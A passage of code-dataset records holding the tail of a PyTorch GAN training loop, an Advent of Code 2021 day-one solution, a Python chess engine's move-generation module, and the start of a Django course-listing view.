netD(fake.detach()).view(-1)\n # Calculate D's loss on the all-fake batch\n errD_fake = criterion_D(output, label)\n # Calculate the gradients for this batch\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n # Add the gradients from the all-real and all-fake batches\n errD = errD_real + errD_fake\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n # Since we just updated D, perform another forward pass of all-fake batch through D\n output = netD(fake).view(-1)\n # Calculate G's loss based on this output\n errG = criterion_G(output, label)\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = output.mean().item()\n # Update G\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f'\n % (epoch, num_epochs, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n\n torch.save(netG, results_dir+\"generator.pyt\")\n torch.save(netD, results_dir+\"discriminator.pyt\")\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or ((epoch == num_epochs - 1) and (i == len(dataloader) - 1)):\n big_iters += 1\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n torch.save(netG, results_dir+\"generator_snapshot\"+str(big_iters)+\".pyt\")\n torch.save(netD, results_dir+\"discriminator_snapshot\"+str(big_iters)+\".pyt\")\n dump(img_list,open(results_dir+\"image_list.pkl\",'wb'))\n\n iters += 1\n\n return D_losses, G_losses, img_list","repo_name":"ejnhbrown/ganmorph","sub_path":"rich_sandbox/Training_funcs.py","file_name":"Training_funcs.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34528179248","text":"import numpy as np\nimport os\n\nINPUT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\nwith open(INPUT) as f:\n lines = f.readlines()\n\n# Remove trailing Whitespace and cast to int\nlines = [int(line.rstrip()) for line in lines]\n\n# Part 1\n# Take Difference between two successive elements. Count elements where difference > 0\nlines_arr = np.array(lines)\ndiff = np.diff(lines_arr)\nprint(diff[diff > 0].shape)\n\n\n# Part 2\n# Same as Part 1 but with moving window sum\nlines_arr = np.array(lines)\nmoving_window = np.ones((3,))\n\nwindow_sum = np.convolve(lines_arr, moving_window, mode=\"valid\")\ndiff = np.diff(window_sum)\nprint(diff[diff > 0].shape)\n","repo_name":"LiXiling/advent-of-code-2021","sub_path":"01/aoc_01.py","file_name":"aoc_01.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70386054832","text":"#\n# Created by: Daymenion 16/05/2022\n#\n# this program under the GNU General Public License v3.0 license.\n\nimport tkinter as tk\nfrom tkinter import simpledialog\n\n\nclass GameState:\n def __init__(self):\n\n # board setup (8x8 board with empty squares)\n self.board = [\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n [\"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\"],\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]]\n\n self.whiteToMove = True # white to move first\n self.moveLog = [] # list of moves made\n self.whiteKingLocation = (7, 4) # white king location (row, col)\n self.blackKingLocation = (0, 4) # black king location (row, col)\n self.possibleMoveFunctions = {'P': self.getPawnMoves, 'N': self.getKnightMoves, 'B': self.getBishopMoves,\n 'R': self.getRookMoves, 'Q': self.getQueenMoves,\n 'K': self.getKingMoves} # dictionary of possible move functions for each piece\n self.enpassantPossible = () # the square for enpassant possible\n self.checkMate = False # checkmate flag\n self.staleMate = False # stalemate flag\n\n self.inCheck = False # check flag\n self.pins = [] # list of pins for each piece\n self.checks = [] # list of checks for each piece (for AI)\n\n self.currentCastlingRights = CastleRights(True, True, True, True) # wks, wqs, bks, bqs (True = can castle)\n # Deep Copy Rights object\n self.castleRightsLog = [\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)] # wks, wqs, bks, bqs (True can castle) list of rights objects\n\n # Simple Chess Moves: Pawns, Knights, Bishops, Rooks, Queens, Kings (no castling)\n def makeMove(self, move):\n self.board[move.startRow][move.startCol] = \"--\" # remove piece from start square\n\n self.board[move.endRow][move.endCol] = move.pieceMoved # add piece to end square\n\n self.moveLog.append(move) # add move to move log\n self.whiteToMove = not self.whiteToMove # switch turn to next player\n\n if move.pieceMoved == 'wK': # if white king moved\n self.whiteKingLocation = (move.endRow, move.endCol) # update white king location\n elif move.pieceMoved == 'bK': # if black king moved\n self.blackKingLocation = (move.endRow, move.endCol) # update black king location\n\n # For Pawn Promotion:\n if move.isPawnPromotion:\n if move.AIPlaying:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + move.AIPromotionKey # add piece to end square\n else:\n ROOT = tk.Tk()\n\n ROOT.withdraw()\n # the input dialog\n\n while True:\n promotedPiece = simpledialog.askstring(\"Game Mode:\", \"Please select a game mode: \\nQ)Queen(Q) \"\n \"\\nR)Rook(R) \\nB)Bishop(B) \\nN)Knight(N)\",\n initialvalue=\"Q\") # ask for promotion piece\n\n print(promotedPiece)\n promotion = ['Q', 'R', 'B', 'N']\n if promotedPiece in promotion:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + promotedPiece # add piece to end square\n break\n else:\n print(\"invalid Promotion\")\n\n # Update Enpassant Variable only if Pawn Moves Two Squares:\n if move.pieceMoved[1] == 'P' and abs(move.startRow - move.endRow) == 2: # if pawn moved two squares\n self.enpassantPossible = ((move.startRow + move.endRow) // 2,\n move.startCol) # update enpassant variable\n else:\n self.enpassantPossible = () # reset enpassant variable\n\n # For Enpassant Move:\n if move.isEnpassantMove: # if enpassant move is true\n self.board[move.startRow][move.endCol] = '--' # remove captured pawn from board\n\n # For Castle Move:\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol - 1] = self.board[move.endRow][\n move.endCol + 1] # move rook to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 2] # move rook to new square\n self.board[move.endRow][move.endCol - 2] = '--'\n\n # Updating Castle Rights on Each Move:\n self.updateCastleRights(move)\n self.castleRightsLog.append(\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)) # add castle rights to log\n\n def undoMove(self): # undo move function\n\n if len(self.moveLog) != 0:\n\n move = self.moveLog.pop() # pop last move from log (undo last move)\n\n self.board[move.startRow][move.startCol] = move.pieceMoved # move piece back to start square\n self.board[move.endRow][move.endCol] = move.pieceCaptured # move piece back to end square\n self.whiteToMove = not self.whiteToMove # switching the turn\n if move.pieceMoved == 'wK':\n self.whiteKingLocation = (move.startRow, move.startCol) # update white king location\n elif move.pieceMoved == 'bK':\n self.blackKingLocation = (move.startRow, move.startCol) # update black king location\n\n # Undo Enpassant Move\n if move.isEnpassantMove:\n self.board[move.endRow][\n move.endCol] = '--' # Making The Ending square blank as the pawn captured was not in that square\n self.board[move.startRow][move.endCol] = move.pieceCaptured # move pawn back to start square\n self.enpassantPossible = (move.endRow, move.endCol) # update enpassant variable\n\n # Undo the captured\n if move.pieceMoved[1] == 'P' and abs(\n move.startRow - move.endRow) == 2: # if pawn moved two squares and captured\n self.enpassantPossible = () # reset enpassant variable\n\n # undo Castle Rights\n self.castleRightsLog.pop() # pop last castle rights from log\n newRights = self.castleRightsLog[-1] # get last castle rights from log\n self.currentCastlingRights = CastleRights(newRights.wks, newRights.bks, newRights.wqs,\n newRights.bqs) # update current castle rights\n\n # undo Castle Move\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 1] # move rook back to new square\n self.board[move.endRow][move.endCol - 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol - 2] = self.board[move.endRow][\n move.endCol + 1] # move rook back to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n\n self.checkMate = False # reset checkmate variable\n self.staleMate = False # reset stalemate variable\n\n def updateCastleRights(self, move): # update castle rights function\n if move.pieceMoved == 'wK': # if white king moved\n self.currentCastlingRights.wks = False # set white king side castle to false\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.pieceMoved == 'bK': # if black king moved\n self.currentCastlingRights.bks = False # set black king side castle to false\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.pieceMoved == 'wR': # if white rook moved\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceMoved == 'bR': # if black rook moved\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n if move.pieceCaptured == 'wR': # if white rook captured\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceCaptured == 'bR': # if black rook captured\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n\n # every possible move that a piece can make without the concern of other pieces\n def getAllPossibleMoves(self): # get all possible moves function\n\n possibleMoves = [] # list of possible moves\n\n for row in range(len(self.board)):\n for col in range(len(self.board[row])):\n turn = self.board[row][col][0] # get the first character of the piece\n if (turn == 'w' and self.whiteToMove) or (\n turn == 'b' and not self.whiteToMove): # if it's correct turn and the piece is white or black\n piece = self.board[row][col][1] # get the second character of the piece\n self.possibleMoveFunctions[piece](row, col,\n possibleMoves) # call the function that corresponds to the piece\n\n return possibleMoves # return the list of possible moves\n\n def getValidMoves(self): # get valid moves function (returns a list of valid moves)\n\n moves = [] # list of valid moves\n self.inCheck, self.pins, self.checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if self.whiteToMove: # if it is white's turn\n kingRow = self.whiteKingLocation[0] # get the row of the white king\n kingCol = self.whiteKingLocation[1] # get the col of the white king\n allyColor = 'w' # set the color of the pieces to white\n else: # if it is black's turn\n kingRow = self.blackKingLocation[0] # get the row of the black king\n kingCol = self.blackKingLocation[1] # get the col of the black king\n allyColor = 'b' # set the color of the pieces to black\n\n if self.inCheck: # if the king is in check (if the king is in check, then the king can't move)\n if len(self.checks) == 1: # if there is only one check\n moves = self.getAllPossibleMoves() # get all possible moves\n check = self.checks[0] # get the check\n checkRow = check[0] # get the row of the check\n checkCol = check[1] # get the col of the check\n pieceChecking = self.board[checkRow][checkCol] # get the piece that is checking the king\n validSquares = [] # list of valid squares\n if pieceChecking[0] == 'N': # if the piece checking the king is a knight\n validSquares = [(checkRow, checkCol)] # add the check square to the list of valid squares\n else:\n for i in range(1, 8): # for each direction\n validSquare = (kingRow + check[2] * i, kingCol + check[\n 3] * i) # get the valid square based on the direction of the check\n validSquares.append(validSquare) # add the valid square to the list of valid squares\n if validSquare[0] == checkRow and validSquare[\n 1] == checkCol: # if the valid square is the check square\n break # break out of the loop\n for i in range(len(moves) - 1, -1, -1):\n if moves[i].pieceMoved[1] != 'K': # if the piece moved is not a king\n if not (moves[i].endRow, moves[i].endCol) in validSquares: # if the end square\n # is not a valid square for the piece to move to\n moves.remove(moves[i]) # remove the move from the list of valid moves\n else:\n self.getKingMoves(kingRow, kingCol, moves) # get the king moves\n else:\n moves = self.getAllPossibleMoves() # get possible moves (if the king isn't in check, then king can move)\n self.getCastleMoves(kingRow, kingCol, moves,\n allyColor) # get the castle moves (if the king is not in check, then the king can move)\n\n return moves # return the list of valid moves\n\n def squareUnderAttack(self, row, col): # square under attack function (returns true if the square is under attack)\n\n self.whiteToMove = not self.whiteToMove # switch to opponent\n oppMoves = self.getAllPossibleMoves() # get all possible moves for the opponent\n\n self.whiteToMove = not self.whiteToMove # switch back to the original color\n\n for move in oppMoves: # for each move\n if move.endRow == row and move.endCol == col: # if the move ends at the square under attack\n return True # return true\n\n return False\n\n def getPawnMoves(self, row, col, possibleMoves): # get pawn moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # direction of the pin\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # get the direction of the pin\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n # for white pieces\n if self.whiteToMove:\n\n # move up 1 or 2 squres\n if self.board[row - 1][col] == \"--\": # if the square above is empty\n if not piecePinned or pinDirection == (-1, 0): # if the piece isn't pinned or the pin direction is up\n possibleMoves.append(\n Move((row, col), (row - 1, col), self.board)) # add the move to the list of possible moves\n if row == 6 and self.board[row - 2][\n col] == \"--\": # if the pawn is on its starting square and the square above it is empty\n possibleMoves.append(\n Move((row, col), (row - 2, col), self.board)) # add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row - 1][col - 1][0] == 'b': # if the square to the left is black\n if not piecePinned or pinDirection == (\n -1, -1): # if the piece isn't pinned or the pin direction is up left\n possibleMoves.append(Move((row, col), (row - 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col - 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row - 1][col + 1][0] == 'b': # if the square to the right is black\n if not piecePinned or pinDirection == (\n -1, 1): # if the piece isn't pinned or the pin direction is up right\n possibleMoves.append(Move((row, col), (row - 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n # for black pieces\n\n else:\n\n # move up 1 or 2 squres\n if self.board[row + 1][col] == \"--\": # if the square below is empty\n if not piecePinned or pinDirection == (1, 0): # if the piece isn't pinned or the pin direction is down\n possibleMoves.append(\n Move((row, col), (row + 1, col), self.board)) # add the move to the list of possible moves\n if row == 1 and self.board[row + 2][\n col] == \"--\": # if the pawn is on its starting square and the square below it is empty\n possibleMoves.append(\n Move((row, col), (row + 2, col), self.board)) # add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row + 1][col - 1][0] == 'w': # if the square to the left is white\n if not piecePinned or pinDirection == (\n 1, 1): # if the piece isn't pinned or the pin direction is down left\n possibleMoves.append(Move((row, col), (row + 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col - 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row + 1][col + 1][0] == 'w': # if the square to the right is white\n if not piecePinned or pinDirection == (\n 1, -1): # if the piece isn't pinned or the pin direction is down right\n possibleMoves.append(Move((row, col), (row + 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n def getKnightMoves(self, row, col, possibleMoves): # get knight moves function\n piecePinned = False # if the piece is pinned\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n # L shapes as in left_down2, left_up2, right_down2, right_up2, left2_down, left2_up, right2_down, right2_up\n if self.whiteToMove: # if white to move\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for n_move in knightMoves: # for each move in the list of knight moves\n endRow = row + n_move[0] # get the row of the end square\n endCol = col + n_move[1] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned: # if the piece isn't pinned\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is not the same color as the piece\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n def getBishopMoves(self, row, col, possibleMoves): # get bishop moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n bishopMoves = ((-1, -1), (1, -1), (-1, 1), (1, 1)) # left_down, right_down, left_up, right_up\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for b_moves in bishopMoves: # for each move in the list of bishop moves\n for i in range(1, 8): # for each square in the row\n endRow = row + b_moves[0] * i # get the row of the end square\n endCol = col + b_moves[1] * i # get the column of the end square\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == b_moves or pinDirection == (-b_moves[0], -b_moves[\n 1]): # if the piece isn't pinned or the pin direction is the same as the bishop move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\":\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getRookMoves(self, row, col, possibleMoves): # get rook moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n if self.board[row][col][1] != 'Q': # if the piece isn't a queen\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n rookMoves = ((-1, 0), (0, -1), (1, 0), (0, 1)) # up, left, down, right\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for r_move in rookMoves: # for each move in the list of rook moves\n for i in range(1, 8): # for each square in the row\n endRow = row + r_move[0] * i # get the row of the end square\n endCol = col + r_move[1] * i # get the column of the end square\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == r_move or pinDirection == (-r_move[0], -r_move[\n 1]): # if the piece isn't pinned or the pin direction is the same as the rook move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\": # if the end square is empty\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getQueenMoves(self, row, col, possibleMoves): # get queen moves function\n self.getBishopMoves(row, col, possibleMoves) # get bishop moves\n self.getRookMoves(row, col, possibleMoves) # get rook moves\n\n def getKingMoves(self, row, col, possibleMoves): # get king moves function\n rowMoves = (-1, -1, -1, 0, 0, 1, 1, 1) # up, left, down, right\n colMoves = (-1, 0, 1, -1, 1, -1, 0, 1) # up, left, down, right\n\n if self.whiteToMove: # if the player is white\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for k_move in range(8): # for each move in the list of king moves\n endRow = row + rowMoves[k_move] # get the row of the end square\n endCol = col + colMoves[k_move] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is the enemy color\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (endRow, endCol) # set the white king location to the end square\n else:\n self.blackKingLocation = (endRow, endCol) # set the black king location to the end square\n\n inCheck, pins, checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if not inCheck: # if the king isn't in check\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (row, col) # set the white king location to the start square\n else:\n self.blackKingLocation = (row, col) # set the black king location to the start square\n\n def getCastleMoves(self, row, col, moves, allyColor): # get castle moves function\n if self.squareUnderAttack(row, col): # if the square is under attack\n return\n if (self.whiteToMove and self.currentCastlingRights.wks) or (\n not self.whiteToMove and self.currentCastlingRights.bks): # if the player can castle kingside\n self.getKingCastleMoves(row, col, moves, allyColor) # get the king castle moves\n\n if (self.whiteToMove and self.currentCastlingRights.wqs) or (\n not self.whiteToMove and self.currentCastlingRights.bqs): # if the player can castle queenside\n self.getQeenCastleMoves(row, col, moves, allyColor) # get the queen castle moves\n\n def getKingCastleMoves(self, row, col, moves, allyColor): # get king castle moves function\n if self.board[row][col + 1] == '--' and self.board[row][\n col + 2] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col + 1)) and (\n not self.squareUnderAttack(row, col + 2)): # if the squares are not under attack\n moves.append(Move((row, col), (row, col + 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def getQeenCastleMoves(self, row, col, moves, allyColor): # get queen castle moves function\n if self.board[row][col - 1] == '--' and self.board[row][col - 2] == '--' and self.board[row][\n col - 3] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col - 1)) and (\n not self.squareUnderAttack(row, col - 2)): # if the squares are not under attack\n moves.append(Move((row, col), (row, col - 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def checkForPinsAndChecks(self): # check for pins and checks function\n pins = []\n checks = []\n inCheck = False\n if self.whiteToMove: # if the player is white\n allyColor = 'w'\n enemyColor = 'b'\n startRow = self.whiteKingLocation[0] # get the white king's row\n startCol = self.whiteKingLocation[1] # get the white king's column\n else: # if the player is black\n allyColor = 'b'\n enemyColor = 'w'\n startRow = self.blackKingLocation[0] # get the black king's row\n startCol = self.blackKingLocation[1] # get the black king's column\n\n # directions = ((-1, -1), (-1, 0), (-1, 1), (1, -1), (1, 0), (1, 1), (0, -1), (0, 1))\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\n for j in range(len(directions)): # for each direction\n d = directions[j] # get the direction\n possiblePin = () # set the possible pin to an empty tuple\n for i in range(1, 8): # for each square in the direction\n endRow = startRow + d[0] * i # get the row of the end square\n endCol = startCol + d[1] * i # get the column of the end square\n\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == allyColor and endPiece[\n 1] != 'K': # if the end square is the ally color and is not a king\n if possiblePin == (): # if the possible pin is empty\n possiblePin = (\n endRow, endCol, d[0], d[1]) # set the possible pin to the end square and the direction\n else:\n break\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n type = endPiece[1]\n # print(\"Black King location\", self.blackKingLocation)\n # print(startRow, startCol,\" enemy found in direction \", d[0], d[1], enemyColor, type, endRow, endCol, i, j)\n # print((i == 1 and type == 'P' and ((enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))))\n # if enemy piece found near King\n if (0 <= j <= 3 and type == 'R') or \\\n (4 <= j <= 7 and type == 'B') or \\\n (i == 1 and type == 'P' and (\n (enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))) or \\\n (type == 'Q') or \\\n (i == 1 and type == 'K'): # if the enemy piece is a rook, bishop, queen, or king\n if possiblePin == (): # if the possible pin is empty\n inCheck = True # if enemy directly in range of King\n # print(\"king in check by: \", enemyColor, type, endRow, endCol)\n checks.append((endRow, endCol, d[0], d[1]))\n break\n else:\n pins.append(possiblePin) # if ally piece in between king and enemy\n break\n else:\n break # if no enemy found the respective direction that poses threat\n else:\n break\n\n # Special Case for Knight Moves\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n for m in knightMoves: # for each knight move\n endRow = startRow + m[0] # get the row of the end square\n endCol = startCol + m[1] # get the column of the end square\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == enemyColor and endPiece[\n 1] == 'N': # if the end square is the enemy color and is a knight\n inCheck = True # if enemy directly in range of King\n checks.append((endRow, endCol, m[0], m[1])) # add the check to the list of checks\n return inCheck, pins, checks\n\n\nclass CastleRights(): # class for castle rights\n def __init__(self, wks, bks, wqs, bqs): # constructor\n self.wks = wks\n self.bks = bks\n self.wqs = wqs\n self.bqs = bqs\n\n\nclass Move():\n ranksToRows = {\"1\": 7,\n \"2\": 6,\n \"3\": 5,\n \"4\": 4,\n \"5\": 3,\n \"6\": 2,\n \"7\": 1,\n \"8\": 0} # dictionary for converting ranks to rows\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3, \"e\": 4, \"f\": 5, \"g\": 6,\n \"h\": 7} # dictionary for converting files to columns\n colsToFiles = {v: k for k, v in filesToCols.items()} # constructor\n\n def __init__(self, startSq, endSq, board, isEnpassantMove=False, isCastleMove=False, AIPromotionKey='Q',\n AIPlaying=False): # constructor\n self.startRow = startSq[0] # get the start row\n self.startCol = startSq[1] # get the start column\n self.endRow = endSq[0] # get the end row\n self.endCol = endSq[1] # get the end column\n self.pieceMoved = board[self.startRow][self.startCol] # get the piece that was moved\n self.pieceCaptured = board[self.endRow][self.endCol] # get the piece that was captured\n\n # For AI:\n self.AIPromotionKey = AIPromotionKey # get the promotion key\n self.AIPlaying = AIPlaying # get the AI playing boolean\n\n # For Pawn Promotion:\n self.isPawnPromotion = False\n if (self.pieceMoved == 'wP' and self.endRow == 0) or (\n self.pieceMoved == 'bP' and self.endRow == 7): # if the pawn is at the end of the board\n self.isPawnPromotion = True # set the pawn promotion boolean to true\n\n # For Enpassant Move:\n self.isEnpassantMove = isEnpassantMove # get the enpassant move boolean\n if self.isEnpassantMove: # if the move is an enpassant move\n if self.pieceMoved == 'wP':\n self.pieceCaptured = 'bP'\n else:\n self.pieceCaptured = 'wP'\n\n self.isCastleMove = isCastleMove # get the castle move boolean\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow * 10 + self.endCol # get the move ID\n\n def __eq__(self, other): # overloaded equality operator\n if isinstance(other, Move): # if the other object is a move\n return self.moveID == other.moveID # return the move ID of the move\n\n def getChessNotation(self): # get the chess notation of the move\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow,\n self.endCol) # return the chess notation of the move\n\n def getRankFile(self, row, col): # get the rank and file of the square\n return self.colsToFiles[col] + self.rowsToRanks[row] # return the rank and file of the square\n","repo_name":"Daymenion/Machine-Learning-Example-Projects","sub_path":"Chess Engine Alpha-Beta Punning and MinMax Search/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":38583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21761089453","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom Database.models import BuyRecord, Course # 用户购买课程的记录\nfrom Tools.SessionManager import SessionManager\nfrom Tools.URLPath import url_index, url_course_view_course\nfrom .forms import AddCourseForm, ModCourseForm\n\n\ndef viewCourse(request): # 查看课程信息\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): #如果是管理员登陆\n courses = Course.objects.all() # 查询全部课程信息\n Authority = 'Admin'\n\n else: #如果是客户登陆\n courses = Course.objects.filter(course_flag=True) # 查询在使用的课程信息\n Authority = 'Customer'\n\n return 